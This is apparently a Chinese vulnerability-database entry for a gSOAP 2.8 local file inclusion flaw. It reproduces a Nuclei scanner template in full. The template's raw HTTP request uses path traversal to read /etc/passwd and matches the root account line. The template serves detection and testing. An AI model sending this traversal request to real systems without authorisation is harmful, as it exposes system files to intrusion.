gsoap-lfi: gSOAP 2.8 - Local File Inclusion

日期: 2025-08-01 | 影响软件: gSOAP | POC: 已公开

漏洞描述

gSOAP 2.8 is vulnerable to local file inclusion.

PoC代码[已公开]

id: gsoap-lfi

info:
  name: gSOAP 2.8 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: gSOAP 2.8 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/47653
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: edb,gsoap,lfi,vuln

http:
  - raw:
      - |
        GET /../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009881b53c5873dea0997434fffa996b02191cc560cf13bd331571cd5393928d27022100cb08de45e1e6de5dcf1c83c988a412d56a899c4d4578073e848a234b6f7e74d3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐